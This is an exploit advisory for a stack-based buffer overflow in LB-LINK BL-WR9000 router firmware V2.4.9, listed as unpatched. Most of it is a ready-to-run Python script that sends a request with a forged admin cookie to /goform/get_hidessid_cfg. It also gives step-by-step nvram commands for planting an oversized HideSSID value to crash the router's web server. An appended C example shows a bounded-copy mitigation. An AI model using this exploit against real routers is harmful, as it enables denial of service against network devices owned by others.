LB-LINK BL-WR9000 V2.4.9 - Stack-based Buffer Overflow in /goform/get_hidessid_cfg

2026.03.17
Risk: High
Local: No
Remote: Yes

#!/usr/bin/env python3
# Exploit Title: LB-LINK BL-WR9000 HideSSID Stack Overflow
# CVE: CVE-2026-4227
# Date: 2026-03-16
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Affected: LB-LINK BL-WR9000 firmware V2.4.9
# Tested on: LB-LINK BL-WR9000 V2.4.9
# Category: Remote Denial of Service
# Platform: Embedded (MIPS/ARM)
# Exploit Type: Remote
# CVSS: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
# Description: Stack-based buffer overflow in /goform/get_hidessid_cfg via overly long HideSSID nvram value
# Fixed in: Not fixed (as of March 2026)
# Usage:
#   python3 exploit.py <router_ip>
#
# Examples:
#   python3 exploit.py 192.168.16.1
#
# Options:
#   -- (none implemented)
#
# Notes:
#   • Requires nvram value HideSSID to be set to a string longer than ~64 bytes before first ';'
#   • Example: nvram_set HideSSID 'A'*300';0;' ; nvram_commit
#   • Triggers crash of goahead web process (DoS)
#
# How to Use
#
# Step 1:
#   Set malicious nvram value (via shell or vulnerable web interface if possible):
#   nvram_set HideSSID 'A'*300';0;'
#   nvram_commit
#
# Step 2:
#   Run this script against the router:
#   python3 exploit.py 192.168.16.1

import requests
import sys
import time


def main():
    if len(sys.argv) != 2:
        print("Usage: python3 exploit.py <router_ip>")
        print("Example: python3 exploit.py 192.168.16.1")
        sys.exit(1)

    ip = sys.argv[1].strip()
    target = f"http://{ip}"
    url = f"{target}/goform/get_hidessid_cfg"

    headers = {
        "X-Requested-With": "XMLHttpRequest",
        "Accept-Language": "en",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
        "Referer": f"{target}/admin/main.html",
        "Cookie": "platform=0; user=admin",
        "Connection": "keep-alive",
        "Content-Type": "application/x-www-form-urlencoded",
    }

    data = "type=gethide2"

    print(f"[+] Target URL : {url}")
    print(f"[+] Payload    : {data}")
    print(f"[+] Cookie     : {headers['Cookie']}")
    print("-" * 50)

    try:
        print("[+] Sending exploit request...")
        start = time.time()
        response = requests.post(
            url,
            headers=headers,
            data=data,
            timeout=8,
            allow_redirects=False
        )
        elapsed = time.time() - start
        print(f"[+] Status code: {response.status_code}")
        print(f"[+] Response   : {response.text[:150]}...")
    except requests.exceptions.Timeout:
        print("[+] Router crashed (timeout) — Exploit successful!")
    except requests.exceptions.ConnectionError:
        print("[+] Connection refused / socket closed — Exploit successful!")
    except Exception as e:
        print(f"[!] Unexpected error: {e}")
    else:
        # The request completed normally, so the web process is still running
        print("[?] No crash detected. Check HideSSID value.")

    print("\n[+] Done.")


if __name__ == "__main__":
    main()
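The mitigation side of the overflow described in the script's notes, as an added example that is not part of the original advisory or the vendor's firmware: a bounded copy of the text before the first ';' that rejects an oversized field instead of writing past a fixed stack buffer. The function names, the 64-byte buffer size (taken from the "~64 bytes" in the notes) and the "0"/"1" flag values are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define HIDESSID_FIELD_MAX 64   /* assumed buffer size, from "~64 bytes" in the notes */

/* Copy the part of a ';'-separated nvram value that precedes the first ';'
 * into dst (capacity dst_len, including the NUL terminator).
 * Returns 0 on success, -1 on a bad argument or when the field does not fit.
 * On failure dst holds "" so callers never read stale stack data. */
int copy_first_field(const char *value, char *dst, size_t dst_len)
{
    if (dst == NULL || dst_len == 0)
        return -1;
    dst[0] = '\0';
    if (value == NULL)
        return -1;

    size_t field_len = strcspn(value, ";");  /* length up to ';' or end of string */
    if (field_len >= dst_len)
        return -1;                           /* reject rather than truncate */

    memcpy(dst, value, field_len);
    dst[field_len] = '\0';
    return 0;
}

/* Hypothetical handler fragment: accept the stored value only if its first
 * field fits the buffer and is "0" or "1" (assumed flag encoding). */
int hidessid_flag_is_valid(const char *nvram_value)
{
    char field[HIDESSID_FIELD_MAX];
    if (copy_first_field(nvram_value, field, sizeof field) != 0)
        return 0;
    return strcmp(field, "0") == 0 || strcmp(field, "1") == 0;
}

int main(void)
{
    char oversized[304];                     /* constructed sample input */
    memset(oversized, 'A', 300);
    memcpy(oversized + 300, ";0;", 4);
    printf("normal value accepted:    %d\n", hidessid_flag_is_valid("0;0;"));
    printf("oversized value accepted: %d\n", hidessid_flag_is_valid(oversized));
    return 0;
}
```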

